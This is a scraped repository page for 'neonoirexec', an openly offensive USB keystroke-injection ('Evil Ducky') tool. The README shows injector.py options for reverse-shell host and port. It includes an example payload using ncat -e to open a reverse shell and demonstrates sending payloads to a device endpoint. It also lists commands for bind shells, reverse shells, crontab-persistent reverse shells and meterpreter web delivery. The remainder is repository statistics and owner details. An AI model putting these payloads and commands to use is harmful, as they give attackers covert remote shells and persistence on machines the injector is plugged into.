https://github.com/byt3n33dl3/neonoirexec
Release Neo the Evil Ducky, A scripts into any Hardware or drive Devices.
Science Score: 13.0%
This score indicates how likely this project is to be science-related based on various indicators:
-
○CITATION.cff file
-
✓codemeta.json file
Found codemeta.json file -
○.zenodo.json file
-
○DOI references
-
○Academic publication links
-
○Academic email domains
-
○Institutional organization owner
-
○JOSS paper metadata
-
○Scientific vocabulary similarity
Low similarity (5.9%) to scientific vocabulary
Keywords
Repository
Release Neo the Evil Ducky, A scripts into any Hardware or drive Devices.
Basic Info
Statistics
- Stars: 12
- Watchers: 1
- Forks: 1
- Open Issues: 0
- Releases: 1
Topics
Metadata Files
README.md
Warning : Newest version of Neo Toolkit expect the Neo to have a firmware in the prefered language, alternatively you can force the french keyboard with the english firmware using the --force arguments. For more customization informations go to swisskyrepo.github.io .
Where to buy a Neo injector ? I got mine from Aliexpress
How to use the script
```c
python3 injector.py -v --host 127.0.0.1 --port 4242 --payload payloads / windows.txt -h
usage: injector.py [-h] [-v] [--host [HOST]] [--port [PORT]]
[--user [USER]] [--pass [PASS]] [--panel [PANEL]]
[--payload [PAYLOAD]]
optional arguments: -h, --help show this help message and exit -v Verbosity of the output --host [HOST] Host reverse-shell --port [PORT] Port reverse-shell --user [USER] Wifi Panel username --pass [PASS] Wifi Panel password --panel [PANEL] Wifi Panel password --payload [PAYLOAD] Payload template ```
Targeting a Windows OS
c
python3 injector.py -v --host 127.0.0.1 --port 4242 --payload payloads/windows.txt
Send a simple reverse-shell payload
``
$ python3 injector.py -v --host 127.0.0.1 --port 4444
-------------------------------------------------------------
Neo injector - You need to be connected to the Exploit AP
-------------------------------------------------------------
__ °
<(o )___
( ._> /
---' @pxcs
Enter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL &'
reverse Payload: Rem:Default Payload Press:130+195 CustomDelay:1000 Print: bash SHELL:14 CustomDelay:1000 Press:176
Sending payload to http://192.168.1.1/runlivepayload ```
Payloads and commands
| Commands | Description | | :------------- | :------------- | | bind | initiate a bind shell on results.port | | reverse | initiate a reverse shell on results.host and results.port | | crontab | set up a crontab reverse shell on results.host and results.port | | meterpreter | use exploit script / web delivery with a posh-payload | | send some text | send the specified text | | h | help | | q | quit |
You can change the options with SET option_name option_value
```c
set host 127.0.0.1 set port 4444 ```
Thanks to: - swisskyrepo - metasploit - pxcs
Owner
- Name: Sulaiman
- Login: byt3n33dl3
- Kind: user
- Location: Error 403: Not on earth
- Website: https://byt3n33dl3.substack.com/
- Twitter: byt3n33dl3
- Repositories: 91
- Profile: https://github.com/byt3n33dl3
I N F R A X 8 6
GitHub Events
Total
- Watch event: 1
Last Year
- Watch event: 1
Issues and Pull Requests
Last synced: 10 months ago
All Time
- Total issues: 1
- Total pull requests: 5
- Average time to close issues: less than a minute
- Average time to close pull requests: 5 minutes
- Total issue authors: 1
- Total pull request authors: 1
- Average comments per issue: 0.0
- Average comments per pull request: 0.2
- Merged pull requests: 5
- Bot issues: 0
- Bot pull requests: 0
Past Year
- Issues: 0
- Pull requests: 0
- Average time to close issues: N/A
- Average time to close pull requests: N/A
- Issue authors: 0
- Pull request authors: 0
- Average comments per issue: 0
- Average comments per pull request: 0
- Merged pull requests: 0
- Bot issues: 0
- Bot pull requests: 0
Top Authors
Issue Authors
- byt3n33dl3 (1)
Pull Request Authors
- byt3n33dl3 (5)